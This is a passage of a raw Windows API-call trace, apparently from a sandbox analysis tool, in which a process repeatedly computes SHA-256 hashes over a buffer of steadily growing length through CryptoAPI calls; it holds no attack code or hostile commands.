[0119.602] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.603] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.603] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x360, dwFlags=0x0) returned 1 [0119.603] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e48140 [0119.603] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e48140, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e48140, pdwDataLen=0xce59c) returned 1 [0119.603] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.603] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.603] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.603] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.603] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x380, dwFlags=0x0) returned 1 [0119.603] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e481d0 [0119.604] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e481d0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e481d0, pdwDataLen=0xce59c) returned 1 [0119.604] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.604] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.604] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.604] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.604] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0119.604] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.604] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46b50 [0119.604] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e46b50, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e46b50, pdwDataLen=0xce59c) returned 1 [0119.604] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.604] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.604] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.605] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.605] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0119.605] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b960 [0119.605] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b960, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b960, pdwDataLen=0xce59c) returned 1 [0119.605] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.605] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.605] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.606] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.606] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0119.606] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.606] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bcf0 [0119.606] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bcf0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bcf0, pdwDataLen=0xce59c) returned 1 [0119.606] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.606] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.606] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.606] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.606] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x400, dwFlags=0x0) returned 1 [0119.606] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.606] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bd80 [0119.606] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bd80, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bd80, pdwDataLen=0xce59c) returned 1 [0119.606] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.606] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.606] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.607] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.607] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x420, dwFlags=0x0) returned 1 [0119.607] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.607] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b990 [0119.607] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b990, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b990, pdwDataLen=0xce59c) returned 1 [0119.607] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.607] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.607] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.607] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.608] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x440, dwFlags=0x0) returned 1 [0119.608] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bc60 [0119.608] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bc60, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bc60, pdwDataLen=0xce59c) returned 1 [0119.608] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.608] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.608] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.608] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.608] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x460, dwFlags=0x0) returned 1 [0119.608] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bd50 [0119.608] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bd50, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bd50, pdwDataLen=0xce59c) returned 1 [0119.608] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.608] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.608] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.609] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.609] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x480, dwFlags=0x0) returned 1 [0119.609] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b900 [0119.609] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b900, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b900, pdwDataLen=0xce59c) returned 1 [0119.609] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.609] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.609] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.610] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.610] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0119.610] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b660 [0119.610] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b660, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b660, pdwDataLen=0xce59c) returned 1 [0119.610] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.610] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.610] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.611] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.611] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0119.611] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b9c0 [0119.611] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b9c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b9c0, pdwDataLen=0xce59c) returned 1 [0119.611] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.611] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.611] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.611] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.611] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0119.611] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bd20 [0119.611] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bd20, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bd20, pdwDataLen=0xce59c) returned 1 [0119.611] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.611] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.611] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.612] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.612] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x500, dwFlags=0x0) returned 1 [0119.612] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.612] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bdb0 [0119.612] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bdb0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bdb0, pdwDataLen=0xce59c) returned 1 [0119.612] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.612] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.612] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.613] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.613] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x520, dwFlags=0x0) returned 1 [0119.613] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.613] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b9f0 [0119.613] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b9f0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b9f0, pdwDataLen=0xce59c) returned 1 [0119.613] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.613] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.613] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.613] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.613] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x540, dwFlags=0x0) returned 1 [0119.613] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.613] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bc90 [0119.614] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bc90, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bc90, pdwDataLen=0xce59c) returned 1 [0119.614] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.614] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.614] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.614] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.614] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x560, dwFlags=0x0) returned 1 [0119.614] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.614] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4bde0 [0119.614] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4bde0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4bde0, pdwDataLen=0xce59c) returned 1 [0119.614] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.614] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.614] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.615] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.615] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x580, dwFlags=0x0) returned 1 [0119.615] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.615] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b930 [0119.615] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b930, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b930, pdwDataLen=0xce59c) returned 1 [0119.615] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.615] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.615] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.615] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.616] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0119.616] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b690 [0119.616] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b690, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b690, pdwDataLen=0xce59c) returned 1 [0119.616] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.616] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.616] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.616] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.616] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0119.616] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.616] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4ba20 [0119.616] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4ba20, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4ba20, pdwDataLen=0xce59c) returned 1 [0119.616] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.616] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.616] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.617] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.617] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0119.617] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.617] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b6c0 [0119.617] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b6c0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b6c0, pdwDataLen=0xce59c) returned 1 [0119.617] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.617] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.617] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.618] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.618] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x600, dwFlags=0x0) returned 1 [0119.618] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.618] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b6f0 [0119.618] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b6f0, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b6f0, pdwDataLen=0xce59c) returned 1 [0119.618] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.618] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.618] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.618] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.618] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x620, dwFlags=0x0) returned 1 [0119.618] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.618] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4ba50 [0119.618] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4ba50, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4ba50, pdwDataLen=0xce59c) returned 1 [0119.618] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.618] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.618] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.619] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.619] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x640, dwFlags=0x0) returned 1 [0119.619] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.619] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b720 [0119.619] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b720, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b720, pdwDataLen=0xce59c) returned 1 [0119.619] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.619] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.619] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.620] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.620] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x660, dwFlags=0x0) returned 1 [0119.620] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.620] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e4b750 [0119.620] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x2, pbData=0x32e4b750, pdwDataLen=0xce59c, dwFlags=0x0 | out: pbData=0x32e4b750, pdwDataLen=0xce59c) returned 1 [0119.620] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.620] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.620] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.621] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.621] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x680, dwFlags=0x0) returned 1 [0119.621] CryptGetHashParam (in: hHash=0x72b510, dwParam=0x4, pbData=0xce59c, pdwDataLen=0xce5ac, dwFlags=0x0 | out: pbData=0xce59c, pdwDataLen=0xce5ac) returned 1 [0119.621] RtlAllocateHeap 